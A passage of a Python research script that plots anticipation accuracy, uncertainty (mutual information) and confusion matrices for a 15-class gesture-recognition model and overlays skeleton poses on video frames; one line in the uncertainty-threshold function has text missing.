True\n draw_body = True\n draw_ball = True\n draw_gaze = True\n\n _,_,mi = calc_uncertainties(probs_u)\n meanst = probs_u.mean(1)\n std = probs_u.std(1)\n y1 = np.clip(meanst-std,0.0,1.0)\n y2 = np.clip(meanst+std,0.0,1.0)\n\n empty = False\n empty_image = (np.ones((480,640,3))*127).astype(np.uint8) \n framesw = pims.Video(\"./dataset/world.mp4\")\n labels = np.load(\"labels_complete_cut.npy\").astype(int) \n #cv2.imshow(\"Action Dataset\",empty_image)\n labels = labels[begin:end]\n colors = [\"green\", \"black\", \"red\", \"blue\", \"brown\", \"indigo\",\"coral\",\"lime\",\"orangered\",\"yellow\", \"navy\",\"salmon\"]\n indexes = np.arange(len(meanst))\n\n for i, label in enumerate(labels):\n \n # convert canvas to image\n \n frame = frames[label[0]]\n cv2.imwrite('start.png',frame[:,:,[2,1,0]])\n \n ball = label[2:4]\n body = label[4:40].reshape((18,2)).astype(int)\n hand = label[40:44].reshape((2,2)).astype(int)\n\n\n frame = empty_image #if empty else frame\n frame = draw_bodypose(frame,body) if draw_body else frame\n frame = draw_head(frame,body) if draw_gaze else frame\n frame = draw_hand_center(frame,hand) if draw_hand else frame\n frame = draw_ballpose(frame,ball.astype(int)) if draw_ball else frame\n cv2.imwrite('skeleton.png',frame[:,:,[2,1,0]])\n #frame = draw_class(frame, label[1])\n\n\n\n # for j in range(probs.shape[1]):\n # axis[0].plot(probs[:i,j], color = colors[j])\n # axis[1].plot(meanst[:i,j], color=colors[j])\n # axis[1].fill_between(indexes[:i],y1[:i,j], y2[:i,j],alpha=0.1, facecolor=colors[j])\n # plt.legend(['act {}'.format(i) for i in range(1,probs.shape[1]+1)], loc='upper right')\n # #print(entropy(probs[i]))\n # fig.canvas.draw()\n\n # img = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8,sep='')\n # img = img.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n # #img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n # img_plot = cv2.resize(img, (640, 480))\n \n\n # image = np.concatenate((img_plot,frame),axis=1)\n #out.write(image[:,:,[2,1,0]])\n cv2.imshow(\"Action Dataset\",frame[:,:,[2,1,0]])\n k = cv2.waitKey(3000)\n if k == 27:break\n if k == 98:draw_ball = not draw_ball #B\n if k == 103:draw_gaze = not draw_gaze #G\n if k == 101:empty = not empty #E\n if k == 104:draw_hand = not draw_hand #H\n if k == 106:draw_body = not draw_body #J\n if k == 32: \n while cv2.waitKey(30) != 32:continue\n plt.close()\n out.release()\n\n\ndef plot_all_charts():\n #\n #titles = [\"$DLSTM_{12m}$ (Movement)\", \"$DLSTM_{12h}$ (Head)\",\"$DLSTM_{12o}$ (Object)\",\"$DLSTM_{12mh}$ (Movement + Head)\", \"$DLSTM_{12mo}$ (Movement + Object)\",\"$DLSTM_{12mho}$ (Movement+Head+Object)\"]\n titles = [\"$DLSTM_{12m}$ \", \"$DLSTM_{12h}$ \",\"$DLSTM_{12o}$ \",\"$DLSTM_{12mh}$ \", \"$DLSTM_{12mo}$ \",\"$DLSTM_{12mho}$ \"]\n \n colors = [\"green\", \"black\", \"blue\", \"red\",\"brown\", \"indigo\",\"coral\",\"lime\",\"orange\",\"yellow\", \"navy\",\"salmon\",\"gray\",\"darkgray\",\"darkorange\"]\n \n #titles = [\"Movement\", \"Head\",\"Movement + Head\"]\n #colors = [\"green\", \"black\", \"blue\", \"red\",\"brown\", \"indigo\"]\n\n actions = {\n 1: \"Pedido de ajuda\",\n 2: \"Venha aqui\",\n 3: \"Pode sair\",\n 4: \"Siga-me\",\n 5: \"Pare\",\n 6: \"Abortar missão\",\n 7: \"Bom\",\n 8: \"Não\",\n 9: \"Ruim\",\n 10:\"Dar passagem\",\n 11:\"Apontar\",\n 12:\"Dúvida\",\n 13:\"Mais alto\",\n 14:\"Mais baixo\",\n 15:\"Silêncio\",\n } \n \n\n videos= pickle.load(open(\"prediction_gesture3_0_91.16.pkl\", 'rb'), encoding=\"bytes\")\n\n\n font_act = font_manager.FontProperties(weight='bold',\n 
style='normal', size=10)\n box = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n for video in videos:\n \n fig, axis = plt.subplots(1,1, figsize=(18, 10))\n \n fig.subplots_adjust(hspace=0.77, left = 0.04, right = 0.99, bottom = 0.1,top=0.9)\n lines = []\n \n axis.set_ylim(0.0,1.0)\n axis.set_xlabel(\"Observation Ratio\", fontsize=14)\n axis.set_ylabel(\"Probability\", fontsize=14)\n #a.tick_params(labelsize=6)\n for tick in axis.xaxis.get_major_ticks():\n tick.label.set_fontsize(12) \n for tick in axis.yaxis.get_major_ticks():\n tick.label.set_fontsize(12) \n \n\n \n begin,end = video['interval']\n probs = video['probs'].mean(1)\n label = video['label']\n pred = video['pred']\n print(probs.shape)\n p = np.amax(probs, axis= 1)\n c = np.argmax(probs, axis= 1)\n x = np.argmax(p>=0.9, axis=0)\n print(x)\n y = p[x]\n a = c[x]\n \n #ratio = len(probs)/100.0\n #probs = np.array([probs[int(i*ratio)] for i in range(100)])\n #observation = [i/100.0 for i in range(100)]\n total = len(probs)\n print(total)\n x = x/float(total)\n observation = [i / float(total) for i in range(total)]\n #axs[i].set_xlim(0,len(probs))\n for cl, color in enumerate(colors):\n line = axis.plot(observation, probs[:,cl], color = color)\n if len(lines) < len(colors):lines.append(line)\n #axis.legend([l for l in range(1,13)], loc='upper right',fontsize = 4, prop = {'weight':'bold'})\n \n line_k = axis.plot([x,x,],[0,y],linestyle='--',color=\"k\", linewidth=3)\n axis.plot([0,x,],[y,y],linestyle='--',color=\"k\", linewidth=3)\n axis.plot(x, y, color='green', linestyle='dashed', marker='o', markerfacecolor='k', markersize=10)\n \n if y >= 0.9:\n tx,ty = [0.02, 0.83] if x>0.5 else [x+0.03,0.83]\n axis.text(0.2,0.55 , \" Act. {} with {}% of Frames\".format(a+1,round(x*100)),fontproperties = font_act, bbox = box)\n if a == label:\n axis.text(0.2,0.55 , \"V\",bbox = box, fontproperties = font_act,color = \"g\")\n else:\n axis.text(0.2,0.55 , \"X\",bbox = box, fontproperties = font_act,color = \"r\")\n else:\n axis.plot([0,1.0,],[0.9,0.9],linestyle='--',color=\"k\", linewidth=3)\n axis.text(0.2,0.55 , \"It was not possible to anticipate\", bbox = box,fontproperties = font_act,color = \"r\")\n \n\n axis.set_title(\"{} - Recognized({})\".format(titles[i],pred+1), weight=\"normal\")\n \n \n fig.suptitle('{} - {}'.format(actions[label+1],label+1), fontsize=20, weight=\"normal\")\n \n font = font_manager.FontProperties(weight='normal',\n style='normal', size=13)\n legend = fig.legend(lines+[line_k], [\"{} - {}\".format(i,actions[i]) for i in range(1,len(colors)+1)]+[\"$p=0.9$\"], loc='center', \\\n prop = font, ncol = 7, shadow=True, frameon=True, fancybox=True)\n #legend.get_frame().set_facecolor((1.0,1.0,1.0))\n \n plt.show()\n return\n plt.savefig('charts/chart_act_({}-{})_{}_{}.png'.format(begin,end,label+1,v))\n plt.close()\n #return\n\ndef plot_uncertainty_threshold():\n\n \n \n # values = pickle.load(open(\"results/prediction_brnn_6441.pkl\", 'rb'), encoding=\"bytes\")\n # values.sort(key = lambda d:d['interval'][0])\n # values_u = values\n \n # for i,(value,value_u) in enumerate(zip(values,values_u)):\n # label = value_u['label']\n # pred = value_u['pred']\n # begin,end = value_u['interval']\n # probs = value['probs']\n # probs_u = value_u['probs']\n # print(begin,end)\n # if label == pred:\n # frames = pims.Video(\"./dataset/external.mp4\")\n # show_video(frames,probs,probs_u,begin,end)\n \n # return\n \n \n \n \n values_u = pickle.load(open(\"prediction_gesture_rt_8040.00.pkl\", 'rb'), encoding=\"bytes\")\n #interval = 
[]\n #pred = []\n #probs = []\n #label = []\n #for value in values_u:\n # interval.append(value['interval'])\n # pred.append(value[b'pred'])\n # probs.append(value[b'probs'])\n # label.append(value[b'label'])\n #values_u = { 'interval':np.array(interval),'pred':np.array(pred),'probs':np.array(probs),'label':np.array(label)}\n # values_u.sort(key = lambda d:d['interval'][0])\n results = []\n for t in range(50):\n predictions = {\"classes\":[], \"labels\":[]} \n t /= 10.0\n corrects = []\n total_frames = []\n corrects_ant = 0\n anticipate = []\n for i,value in enumerate(values_u):\n label = value['label']\n pred = value['pred']\n # begin,end = value['interval']\n probs = value['probs']\n\n vr,h,mi = calc_uncertainties(probs)\n meanst = probs.mean(1)\n std = probs.std(1)\n c = np.argmax(meanst, axis= 1)\n\n x = np.argmax(mi0 and a == label:\n corrects_ant += 1.0\n # else: \n # # print(\"x {}, begin {}, pred {}, label {}\".format(x,begin,a,label))\n # print(begin)\n # if x == 0:a = 0\n\n # predictions[\"labels\"].append(label)\n # predictions[\"classes\"].append(a)\n\n ant = float(x)/len(probs) if x > 0 else 1.0 #len(probs)\n anticipate.append(ant)\n total_frames.append(len(probs))\n\n corrects.append(pred==label)\n # plot_conf_matrix(predictions)\n # return\n acc = corrects_ant/len(corrects)\n m = sum(total_frames)/len(total_frames)\n ant = (sum(anticipate)/len(anticipate))\n results.append([t,acc,ant])\n \n \n results = np.array(results) \n #results[:,2]/=100\n \n acc = results[:,1].max()\n pos = results[:,1].argmax()\n u_acc = results[pos,0]\n acc_frame = results[pos,2]\n \n frame = results[:,2].min()\n pos = results[:,2].argmin()\n u_frame = results[pos,0]\n frame_acc = results[pos,1]\n\n print(acc, frame, u_acc, u_frame)\n fig, axis = plt.subplots(1,1,figsize=(12, 5))\n g,=axis.plot(results[:,0],results[:,1],color = \"g\")\n o, = axis.plot(results[:,0],results[:,2],color = \"orange\")\n k,= axis.plot([u_acc,u_acc],[0,acc],linestyle='--',color=\"k\", linewidth=1)\n axis.plot([0,u_acc],[acc,acc],linestyle='--',color=\"k\", linewidth=1)\n axis.plot([0,u_acc],[acc_frame,acc_frame],linestyle='--',color=\"k\", linewidth=1)\n \n axis.text(u_acc,acc+0.01,\"{:.2f}%\".format(acc*100))\n axis.text(u_frame,frame_acc+0.01,\"{:.2f}%\".format(frame_acc*100))\n\n b,=axis.plot([u_frame,u_frame],[0,frame],linestyle='-.',color=\"b\", linewidth=1)\n axis.plot([0,u_frame],[frame,frame],linestyle='-.',color=\"b\", linewidth=1)\n axis.plot([0,u_frame],[frame_acc,frame_acc],linestyle='-.',color=\"b\", linewidth=1)\n axis.plot([u_frame, u_frame],[frame_acc,frame],linestyle='-.',color=\"b\", linewidth=1)\n \n axis.text(u_acc+0.01, acc_frame+0.01,\"{}% of Frames\".format(int(acc_frame*100)))\n axis.text(u_frame+0.01,frame-0.04,\"{}% of Frames\".format(int(frame*100)))\n\n\n axis.set_xlabel(\"Uncertainty (Mutual Information)\")\n axis.set_ylabel(\"Anticipation Accuracy / Observation Ratio(OR)\")\n axis.legend([g,o,k,b],[\"Anticipation Accuracy\", \"Average OR Anticipation\",\"Maximum Anticipation Accuracy\",\"Minimum Average OR Anticipation\"],loc=\"center right\",framealpha=1, frameon=True, fancybox=True)\n axis.set_title(\"Anticipation vs Uncertainty ($BLSTM_{MC}$)\", weight=\"bold\")\n plt.show()\n\n\n\ndef generate_confusion_matrix( predictions, class_names):\n \n def plot_confusion_matrix(cm, classes,\n normalize=True,\n title='Confusion matrix (%)',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if 
normalize:\n cm = 100 * cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n print(cm)\n print(accuracy_score(predictions[\"labels\"], predictions[\"classes\"]))\n \n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n # plt.title(title)\n plt.colorbar()\n for acc, c in zip(np.diag(cm),class_names):\n print(\" & {:.2f}\\\\% & \".format(acc))\n \n plt.xticks(list(range(len(class_names))), classes, rotation=90)\n plt.yticks(list(range(len(class_names))), classes)\n\n fmt = '.1f' if normalize else 'd'\n thresh = cm.max() / 2.\n symbol = \"%\" if normalize else \"\"\n for i, j in product(range(cm.shape[0]), range(cm.shape[1])):\n \n if cm[i, j] > 0:\n #if i == j:\n plt.text(j, i, format(cm[i, j], fmt),\n fontsize=12, ha=\"center\", va=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n # plt.ylabel('Real')\n # plt.xlabel('Predicted')\n # Compute confusion matrix\n cnf_matrix = confusion_matrix(predictions[\"labels\"],predictions[\"classes\"])\n np.set_printoptions(precision=2)\n \n\n # # Plot normalized confusion matrix\n plt.figure(figsize=(8,8))\n plot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True,\n # title='Normalized confusion matrix'\n )\n plt.grid(None)\n plt.show()\n # plt.savefig(\"conf_DLSTM_complete.svg\", format=\"svg\")\n \n\ndef plot_conf_matrix(predictions = None):\n if predictions is None:\n values= pickle.load(open(\"./RTGR/prediction_gesture1_72.00.pkl\", 'rb'), encoding=\"bytes\")\n # values= pickle.load(open(\"prediction_gesture_rt_8040.00.pkl\", 'rb'), encoding=\"bytes\")\n \n \n predictions = {\"classes\":[], \"labels\":[]}\n \n for i,value in enumerate(values):\n predictions[\"labels\"].append(value['label'])\n predictions[\"classes\"].append(value['pred'])\n \n # names = [\"Ask\",\"Come_Here\",\"Leave\",\"Follow\",\"Stop\",\"Abort\",\"Good\",\"No\",\"Bad\",\"Give_way\",\"Pointing\",\"Doubt\",\"Louder\",\"Quieter\",\"Be_quiet\"]\n names = [\"Pedido de ajuda\",\"Venha aqui\",\"Pode sair\",\"Siga-me\",\"Pare\",\"Abortar missão\",\"Bom\",\"Não\",\"Ruim\",\"Dar passagem\",\"Apontar\",\"Dúvida\",\"Mais alto\",\"Mais baixo\",\"Silêncio\"]\n generate_confusion_matrix(predictions,names)\n \n\n\ndef plot_probability_threshold():\n values= pickle.load(open(\"results/prediction_m_g_b.pkl\", 'rb'), encoding=\"bytes\")\n predictions = {\"classes\":[], \"labels\":[]}\n results = []\n for t in range(100):\n t /= 100.0\n corrects = []\n total_frames = []\n corrects_ant = 0\n anticipate = []\n anticipated = -1\n for i,value in enumerate(values):\n label = value[b'label']\n pred = value[b'pred']\n begin,end = value[b'interval']\n probs = value[b'probs']\n\n c = np.argmax(probs, axis= 1)\n p = np.amax(probs, axis= 1)\n \n m = p>t\n x = np.argmax(m)\n count = 0\n\n # if x>0:\n # for j in range(x, len(m)):\n # if m[j]:\n # count += 1\n # x = j\n # else:\n # count = 0\n # x = 0\n \n # if count == t:break\n \n a = c[x]\n if x >0 and a == label:\n corrects_ant += 1.0\n \n #predictions[\"labels\"].append(label)\n #predictions[\"classes\"].append(a)\n\n ant = float(x)/len(probs) if x > 0 else 1.0 #len(probs)\n anticipate.append(ant)\n total_frames.append(len(probs))\n\n corrects.append(pred==label)\n #plot_conf_matrix(predictions)\n #return\n acc = corrects_ant/len(corrects)\n m = sum(total_frames)/len(total_frames)\n ant = (sum(anticipate)/len(anticipate))\n \n results.append([t,acc,ant])\n \n results = np.array(results) \n #\n 
results[0,[1,2]] = results[1,[1,2]]\n \n acc = results[:,1].max()\n pos = results[:,1].argmax()\n u_acc = results[pos,0]\n acc_frame = results[pos,2]\n \n frame = results[:,2].min()\n pos = results[:,2].argmin()\n u_frame = results[pos,0]\n frame_acc = results[pos,1]\n\n print(acc, frame, u_acc, u_frame)\n fig, axis = plt.subplots(1,1,figsize=(12, 5))\n g,=axis.plot(results[:,0],results[:,1],color = \"g\")\n o, = axis.plot(results[:,0],results[:,2],color = \"orange\")\n k,= axis.plot([u_acc,u_acc],[0,acc],linestyle='--',color=\"k\", linewidth=2)\n axis.plot([0,u_acc],[acc,acc],linestyle='--',color=\"k\", linewidth=2)\n axis.plot([0,u_acc],[acc_frame,acc_frame],linestyle='--',color=\"k\", linewidth=2)\n \n axis.text(u_frame,frame_acc-0.05,\"{:.2f}%\".format(frame_acc*100))\n axis.text(u_acc,acc+0.01,\"{:.2f}%\".format(acc*100))\n\n b,=axis.plot([u_frame,u_frame],[0,frame],linestyle='-.',color=\"b\", linewidth=1)\n axis.plot([0,u_frame],[frame,frame],linestyle='-.',color=\"b\", linewidth=1)\n axis.plot([0,u_frame],[frame_acc,frame_acc],linestyle='-.',color=\"b\", linewidth=1)\n axis.plot([u_frame, u_frame],[frame_acc,frame],linestyle='-.',color=\"b\", linewidth=1)\n \n\n axis.text(u_acc+0.01, acc_frame+0.01,\"{}%\".format(int(acc_frame*100)))\n axis.text(u_frame+0.01,frame-0.04,\"{}%\".format(int(frame*100)))\n\n axis.set_ylabel(\"Anticipation Accuracy / Observation Ratio(OR)\")\n\n axis.set_xlabel(\"Probability\")\n axis.legend([g,o,k,b],[\"Anticipation Accuracy\", \"Average OR Anticipation\",\"Maximum Anticipation Accuracy\",\"Minimum Average OR Anticipation\"],loc=\"center left\", framealpha=1, frameon=True)\n axis.set_title(\"Anticipation vs Probability ($DLSTM_{mho}$)\", weight=\"bold\")\n \n # axis.set_xlabel(\"Aditional OR after the first prediction (z)\")\n # axis.legend([g,o,k],[\"Anticipation Accuracy (threshold = 0.9)\", \"Average OR Anticipation\",\"Maximum Anticipation Accuracy\"],loc=\"center right\", framealpha=1, frameon=True)\n #axis.set_title(\"Anticipation with threshold = 0.9\", weight=\"bold\")\n plt.show()\n\n\n\ndef plot_uncertainty():\n font_act = font_manager.FontProperties(weight='bold',\n style='normal', size=10)\n box = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n th=0.2\n values = pickle.load(open(\"prediction_gesture3_0_91.16.pkl\", 'rb')) #prediction_BBB_9833.pkl\n values.sort(key = lambda d:d['interval'][0])\n colors = [\"green\", \"black\", \"blue\", \"red\",\"brown\", \"indigo\",\"coral\",\"lime\",\"orange\",\"yellow\", \"navy\",\"salmon\",\"gray\",\"darkorange\",\"deepskyblue\"]\n for i,value in enumerate(values):\n lines = []\n label = value['label']\n pred = value['pred']\n b,e = value['interval'] \n fig, axs = plt.subplots(1, 2,figsize=(20, 5))\n begin,end = value['interval']\n probs = value['probs']\n vr,h,mi = calc_uncertainties(probs)\n meanst = probs.mean(1)\n std = probs.std(1)\n\n axs[0].set_xlabel(\"Frame\")\n axs[0].set_ylabel(\"Probability\")\n axs[1].set_xlabel(\"Frame\")\n axs[1].set_ylabel(\"Mutual Information\")\n\n y1 = np.clip(meanst-std,0.0,1.0)\n y2 = np.clip(meanst+std,0.0,1.0)\n p = np.amax(meanst, axis= 1)\n c = np.argmax(meanst, axis= 1)\n std = std[range(len(c)),c]\n xu = np.argmax(mi < th) #using uncertainty\n x = np.argmax(p>=0.9)\n #print(std[xu])\n\n y = p[x]\n yu = p[xu]\n #hc = h[x]\n mic = mi[x]\n #hu = h[xu]\n miu = mi[xu]\n a = c[xu]\n indexes = np.arange(len(meanst))\n\n #axs[1].plot(norm(vr))\n #axs[1].plot(h )\n line_mi, = axs[1].plot(mi,color=\"g\")\n line_h, = axs[1].plot(h,color=\"r\")\n line_vr, = 
axs[1].plot(vr,color=\"orange\")\n \n\n axs[0].set_xlim(0,len(probs)+10)\n line_k, line_b = None, None\n for v in range(15): \n line, = axs[0].plot(meanst[:,v], color=colors[v])\n axs[0].fill_between(indexes,y1[:,v], y2[:,v],alpha=0.3, facecolor=colors[v])\n if len(lines) < len(colors):lines.append(line)\n\n if xu > 0:\n axs[0].plot([xu,xu],[0,yu],linestyle='--',color=\"k\", linewidth=2)\n axs[0].plot([0,xu],[yu,yu],linestyle='--',color=\"k\", linewidth=2)\n\n line_k,=axs[1].plot([xu,xu],[0,miu],linestyle='--',color=\"k\", linewidth=2)\n axs[1].plot([0,xu],[miu,miu],linestyle='--',color=\"k\", linewidth=2)\n \n tx,ty = [2,yu-0.07] if xu>70 else [xu+3,yu-0.07]\n axs[0].text(tx,ty , \" Act. {} at Frame {}\".format(a+1,xu),fontproperties = font_act, bbox = box)\n if a == label:\n axs[0].text(tx,ty , \"V\",bbox = box, fontproperties = font_act,color = \"g\")\n else:\n axs[0].text(tx,ty , \"X\",bbox = box, fontproperties = font_act,color = \"r\")\n #plt.savefig('charts_uncertainty/chart_act{}_{}.png'.format(str(label+1),i))\n else:\n axs[0].text(10, 0.5 , \"It was not possible to anticipate\", bbox = box,fontproperties = font_act,color = \"r\")\n line_k,=axs[1].plot([0,len(mi)],[0.1,0.1],linestyle='--',color=\"k\", linewidth=2)\n\n if x>0:\n axs[0].plot([x,x,],[0,y],linestyle='-.',color=\"b\", linewidth=2)\n axs[0].plot([0,x,],[y,y],linestyle='-.',color=\"b\", linewidth=2)\n\n axs[1].plot([x,x,],[0,mic],linestyle='-.',color=\"b\", linewidth=2)\n line_b, =axs[1].plot([0,x,],[mic,mic],linestyle='-.',color=\"b\", linewidth=2)\n \n \n axs[0].set_title(\"label ({}) / Prediction ({})\".format(label+1,pred+1), weight=\"bold\")\n axs[0].legend(lines+[line_k,line_b],[\"{}\".format(i) for i in range(1,len(colors)+1)]+[\"MI < {}\".format(th),\"prob >= 0.9\"],loc=\"center right\")\n axs[1].legend([line_mi,line_h,line_vr,line_k,line_b],[\"MI\",\"MI < {}\".format(th),\"prob >= 0.9\"])\n axs[1].set_title(\"Uncertainty - (MI - Mutual Information)\", weight=\"bold\")\n #plt.show()\n #return \n #if xu<=0 or a != label:\n\n plt.savefig('charts/chart_act_({}-{})_{}_{}.png'.format(begin,end,label+1,i))\n plt.close()\n\n\n\ndef show_many(frames, m,g,b,mg,mgb, out):\n #labels_body = np.load(\"labels_body.npy\").astype(int)\n\n probs = np.array([m[b'probs'], g[b'probs'], b[b'probs'],mg[b'probs'] , mgb[b'probs']])\n #pred = np.array([m[b'pred'], mg[b'pred'] , mgb[b'pred']])\n # label = np.array([m[b'label'], mg[b'label'] , mgb[b'label']])\n begin,end = m[b'interval']\n \n \n\n\n fig, axs = plt.subplots(2, 3)\n axs = axs.reshape((-1,))\n fig.subplots_adjust(hspace=0.5)\n titles = [\"Movement\", \"Gaze\",\"Ball\",\"Movement + Gaze \", \"Movement + Gaze + Ball\",\"\"]\n for a,t in zip(axs,titles):\n if t ==\"\":\n a.grid(False)\n a.set_yticklabels([])\n a.set_xticklabels([])\n else:\n a.set_xlim(0,len(probs[0]))\n a.set_ylim(0.0,1.0)\n a.set_xlabel(\"Frame\")\n a.set_title(t)\n a.set_ylabel(\"Accuracy\")\n a.tick_params(labelsize=6)\n \n # fig = plt.figure(facecolor=(0.6843, 0.9098, 0.9098))\n # plt.xlim([0,len(prob_m)])\n # plt.ylim([0.0,1.0])\n # plt.xlabel(\"Frame\")\n # plt.ylabel(\"Accuracy\")\n\n draw_hand = True\n draw_body = True\n draw_ball = True\n draw_head = True\n empty = False\n empty_image = (np.ones((480,640,3))*127).astype(np.uint8) \n #framesw = pims.Video(\"./dataset/world.mp4\")\n labels = np.load(\"labels_complete_cut.npy\").astype(int) \n #cv2.imshow(\"Action Dataset\",empty_image)\n labels = labels[begin:end]\n colors = [\"green\", \"black\", \"blue\", \"red\",\"brown\", 
\"indigo\",\"coral\",\"lime\",\"orange\",\"yellow\", \"navy\",\"salmon\"]\n for i, label in enumerate(labels):\n\n # convert canvas to image\n\n frame = frames[label[0]]\n ball = label[2:4]\n body = label[4:40].reshape((18,2)).astype(int)\n hand = label[40:44].reshape((2,2)).astype(int)\n\n\n frame = empty_image if empty else frame\n frame = draw_head(frame,body) if draw_head else frame\n frame = draw_bodypose(frame,body) if draw_body else frame\n frame = draw_hand_center(frame,hand) if draw_hand else frame\n frame = draw_ballpose(frame,ball.astype(int)) if draw_ball else frame\n frame = draw_class(frame, label[1])\n #frame = cv2.resize(frame, (320, 240))\n\n\n for a,p in zip(axs[:-1],probs):\n for j in range(12):\n a.plot(p[:i,j], color = colors[j])\n a.legend([i for i in range(1,13)], loc='upper right',fontsize = 6)\n axs[-1].imshow(frame)\n fig.canvas.draw()\n\n img = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8,sep='')\n img = img.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n #img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n img_plot = cv2.resize(img, (1280, 720))\n img_plot = img_plot[:,:,[2,1,0]]\n out.write(img_plot)\n continue\n\n #image = np.concatenate((img_plot,frame),axis=1)\n cv2.imshow(\"Action Dataset\",img_plot[:,:,[2,1,0]])\n k = cv2.waitKey(10)\n print(k)\n if k == 27:break\n if k == 98:draw_ball = not draw_ball #B\n if k == 101:empty = not empty #E\n if k == 104:draw_hand = not draw_hand #H\n if k == 106:draw_body = not draw_body #J\n if k == 32: \n while cv2.waitKey(30) != 32:continue\n plt.close()\n\ndef plot_acc_classes():\n th_acc = [0.8,0.9]\n th_ent = [0.6,0.38]\n #titles_acc = [\"Movement\", \"Head\", \"Object\", \"Movement + Head\", \"Movement + Object\", \"Movement + Head + Object\",\"Threshold at {}\".format(th_acc[0]), \"Threshold at {}\".format(th_acc[1])]\n titles_acc = [\"$DLSTM_{6m}$ (Movement)\", \"$DLSTM_{6h}$ (Head)\", \"$DLSTM_{6o}$ (Object)\", \"$DLSTM_{6mh}$ (Movement + Head)\", \"$DLSTM_{6mo}$ (Movement + Object)\", \"$DLSTM_{6mho}$ (Movement + Head + Object)\", \"{}% of accuracy\".format(int(th_acc[0]*100)), \"{}% of accuracy\".format(int(th_acc[1]*100))]\n titles_ent = [\"Movement\", \"Head\", \"Object\", \"Movement + Head\", \"Movement + Object\", \"Movement + Head + Object\",\"Threshold at {}\".format(th_ent[0]), \"Threshold at {}\".format(th_ent[1])]\n #titles_ent = [\"Movement\", \"Head\", \"Movement + Head\", \"Threshold at {}\".format(th_ent[0]), \"Threshold at {}\".format(th_ent[1])]\n\n #plt.rc('text', usetex=True)\n #plt.rc('font', family='serif')\n actions = [0,1,2,3,4,5]\n actions = [6,7,8,9,10,11]\n actions = [0,1,2,3,4,5,6,7,8,9,10,11]\n acc_classes = np.zeros((100,len(titles_acc)-2))\n entropies = np.zeros((100,len(titles_acc)-2))\n fig, axs = plt.subplots(1, 1, figsize=(12, 12))\n fig.subplots_adjust(hspace=1.0)\n #axs = axs.reshape((-1,))\n for s, source in enumerate( [\"mov\",\"gaze\",\"ball\",\"mov_gaze\", \"mov_ball\", \"complete\"]):\n #values = pickle.load(open(\"results/prediction_m_g_b.pkl\", 'rb'), encoding=\"bytes\")\n #values = pickle.load(open(\"./results/prediction_6_g.pkl\", 'rb'), encoding=\"bytes\")\n # if len(sys.argv) >1:\n # source = sys.argv[1]\n values = pickle.load(open(\"./results/prediction_m_g_b.pkl\", 'rb'),encoding=\"bytes\")\n \n if source ==\"gaze\":\n values = pickle.load(open(\"./results/prediction{}_g.pkl\".format(\"_6\" if len(actions) == 7 else \"\"), 'rb'), encoding=\"bytes\")\n\n elif source ==\"mov\":\n values = pickle.load(open(\"./results/prediction{}_m.pkl\".format(\"_6\" if 
len(actions) == 7 else \"\"), 'rb'), encoding=\"bytes\")\n\n        elif source ==\"ball\":\n            values = pickle.load(open(\"./results/prediction_b.pkl\", 'rb'), encoding=\"bytes\")\n\n        elif source ==\"mov_gaze\":\n            values = pickle.load(open(\"./results/prediction{}_m_g.pkl\".format(\"_6\" if len(actions) == 7 else \"\"), 'rb'), encoding=\"bytes\")\n\n        elif source ==\"mov_ball\":\n            values = pickle.load(open(\"./results/prediction_m_b.pkl\", 'rb'), encoding=\"bytes\")\n        \n        values = [v for v in values if v[b'label'] in actions]\n        corrects_ant = 0.0\n        corrects = []\n        anticipate = []\n        total_frames = []\n        for v in values:\n            begin,end = v[b'interval']\n            probs = v[b'probs']\n            label = v[b'label'].numpy()\n            pred = v[b'pred'].numpy()\n            \n            if len(probs.shape)>2:\n                vr,h,mi = calc_uncertainties(probs)\n                std = probs.std(1)\n                probs = probs.mean(1)\n                c = np.argmax(probs, axis= 1)\n                std = std[range(len(c)),c] #index the per-class std by the predicted class\n            p = np.amax(probs, axis= 1)\n            c = np.argmax(probs, axis= 1)\n            \n            x = np.argmax(p >=0.9)\n            #print(\"{:.1f}/{}- {:.4f} - {:.4f} - {:.4f}\".format(vr[x],label,h[x],mi[x],std[x]))\n            y = p[x]\n            a = c[x]\n            if a == label:\n                corrects_ant += 1.0\n\n            ant = x if x > 0 else len(probs)\n            anticipate.append(ant/float(len(probs)))\n            total_frames.append(len(probs))\n            a = a*c\n            corrects.append(pred==label)\n\n\n            corr = c == label #) * (p>0.9)\n            corr_ent = -1*np.sum(probs*np.log(probs),1)\n            ratio = len(corr) / 100.0\n            for i in range(100):\n                p = corr[int(i*ratio)]\n                acc_classes[i,s] += float(p)\n\n                p = corr_ent[i] if i < len(corr_ent) else corr_ent[-1]\n                entropies[i,s] += float(p)\n        \n        m = sum(total_frames)/len(total_frames)\n\n        \n        print(\" {}: {:.2f} - ({:.2f}/{:.2f}% acc)\".format(source, (sum(anticipate)/len(anticipate))*m, corrects_ant/len(corrects)*100, sum(corrects)/float(len(corrects))*100) )\n    #entropies /= len(actions)*20 \n    acc_classes /= len(actions)*20\n    observation_ration = np.array([ i / 100.0 for i in range(100)])\n    \n    axs.plot(observation_ration, acc_classes,)\n    axs.axhline(y=th_acc[0], color='b', linestyle='-.')\n    axs.axhline(y=th_acc[1], color='k', linestyle='--')\n    axs.legend(titles_acc, loc='lower right')\n    axs.set_title(\"Extended dataset - 12 Actions\")\n    axs.set_xlabel(\"Observation Ratio\")\n    axs.set_ylabel(\"Accuracy\")\n    \n    # d = loadmat(\"./results/paul.fig\",squeeze_me=True, struct_as_record=False)\n    # matfig = d['hgS_070000']\n    # childs = matfig.children\n    # ax1 = [c for c in childs if c.type == 'axes']\n    # if(len(ax1) > 0):\n    #     ax1 = ax1[0]\n    # legs = [c for c in childs if c.type == 'scribe.legend']\n    # if(len(legs) > 0):\n    #     legs = legs[0]\n    # else:\n    #     